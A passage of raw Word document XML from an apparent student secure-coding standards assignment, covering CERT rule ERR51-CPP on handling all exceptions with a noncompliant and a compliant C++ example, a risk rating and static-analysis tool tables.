          <w:p w14:paraId="4DFBB62B" w14:textId="5F4E7CBF" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId99" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C886138" w14:textId="6C366901" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270673C4" w14:textId="5C352690" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId100" w:history="1">
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C: Rule PRE31-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC874CF" w14:textId="77777777" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">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 side effect in arguments to unsafe macro (rule partially covered)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D93F88D" w14:textId="7E153CBF" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C529D" w14:paraId="28383A14" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC45772" w14:textId="662321B9" w:rsidR="007C529D" w:rsidRDefault="00000000" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId101" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007C529D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>RuleChecker</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D5B7F9C" w14:textId="427E00C4" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3B83A6" w14:textId="7B0812CD" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>expanded-side-effect-multiplied</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>expanded-side-effect-not-evaluated</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>side-effect-not-expanded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08365A70" w14:textId="7124592F" w:rsidR="007C529D" w:rsidRDefault="007C529D" w:rsidP="007C529D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially checked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22" w:name="_Toc52464065"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="145AC2A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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B141EF9" w14:textId="16815D86" w:rsidR="00381847" w:rsidRDefault="007B431F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ERR</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>051</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="007047DC">
              <w:t>CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7DF53768" w14:textId="7F515AEF" w:rsidR="00381847" w:rsidRDefault="007047DC">
            <w:r w:rsidRPr="007047DC">
              <w:t>Handle all exceptions</w:t>
            </w:r>
            <w:r w:rsidR="00D72007">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00D72007" w:rsidRPr="00D72007">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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28913F6B"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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62A3015" w:rsidR="00F72634" w:rsidRDefault="007047DC" w:rsidP="00A72503">
            <w:r w:rsidRPr="007047DC">
              <w:t xml:space="preserve">In this noncompliant code example, neither </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007047DC">
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007047DC">
              <w:t xml:space="preserve">) nor main() catch exceptions thrown by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007047DC">
              <w:t>throwing_func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007047DC">
              <w:t xml:space="preserve">(). Because no matching handler can be found for the exception thrown, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007047DC">
              <w:t>std::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007047DC">
              <w:t>terminate() is called.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="3CEA03A3" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4211F0C5" w14:textId="77777777" w:rsidR="00EB6792" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">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(false);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="454E9BFE" w14:textId="77777777" w:rsidR="00EB6792" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C344B9" w14:textId="77777777" w:rsidR="00EB6792" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25306B2A" w14:textId="77777777" w:rsidR="00EB6792" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>throwing_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8BEAC5" w14:textId="77777777" w:rsidR="00EB6792" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBA7078" w14:textId="77777777" w:rsidR="00EB6792" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A796A76" w14:textId="77777777" w:rsidR="00EB6792" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">
            <w:r>
              <w:t xml:space="preserve">int </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>main(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EF5F38D" w14:textId="77777777" w:rsidR="00EB6792" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="728394A2" w14:textId="6C8D5B63" w:rsidR="00F72634" w:rsidRDefault="00EB6792" w:rsidP="00EB6792">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="789A568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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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F8D0832" w:rsidR="00F72634" w:rsidRDefault="00EB6792" w:rsidP="00A72503">
            <w:r w:rsidRPr="00EB6792">
              <w:t xml:space="preserve">In this compliant solution, the main entry point handles all exceptions, which ensures that the stack is unwound up to the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EB6792">
              <w:t>main(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EB6792">
              <w:t>) function and allows for graceful management of external resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="5DBE36E7" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5925FE26" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">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(false);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2193CD13" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E2F2081" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30FEBD18" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>throwing_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A91F74" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E2887E5" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23F24578" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">int </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>main(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="205FC804" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">  try {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1588F681" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42657D6B" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">  } catch (...) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A894172" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">    // Handle error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EA08883" w14:textId="77777777" w:rsidR="00E937F7" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B81CDBB" w14:textId="3FA1B1C0" w:rsidR="00F72634" w:rsidRDefault="00E937F7" w:rsidP="00E937F7">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="654D300E" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3977C1" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Int_4S9Yl0C0"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>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C4FF0A3" w14:textId="77777777" w:rsidR="003256BE" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r w:rsidR="007E34BE">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 8.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A623D7">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Practice Defense in Depth</w:t>
            </w:r>
            <w:r w:rsidR="00A623D7">
              <w:t>: Handling all exceptions ensures that unexpected errors or exceptional conditions do not lead to unpredictable behavior or security vulnerabilities. It adds a layer of defense by ensuring that the application maintains stability and security even in the face of unexpected failures.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B40BD2" w14:textId="7AC1F0DF" w:rsidR="00620177" w:rsidRPr="003256BE" w:rsidRDefault="003256BE" w:rsidP="003256BE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003256BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10. Adopt a Secure Coding Standard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00620177" w:rsidRPr="003256BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="004C2429">
              <w:t>A secure coding standard typically includes guidelines on proper exception handling, ensuring that exceptions are consistently managed across the application.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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FB1DA7B" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1517828B" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41F7CAAA" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A26B020" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="172EFA93" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A5DE4FC" w14:textId="17959A2C" w:rsidR="00B475A1" w:rsidRDefault="00DF76B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F2670C9" w14:textId="5363E903" w:rsidR="00B475A1" w:rsidRDefault="00DF76B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C1B5AC" w14:textId="16EB217B" w:rsidR="00B475A1" w:rsidRDefault="00DF76B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62635B7A" w14:textId="25A177BF" w:rsidR="00B475A1" w:rsidRDefault="00DF76B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18B948EA" w14:textId="6CD475C3" w:rsidR="00B475A1" w:rsidRDefault="00DF76B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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A677BAD" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F007367" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F580697" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310BC6" w14:paraId="3516DD4E" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
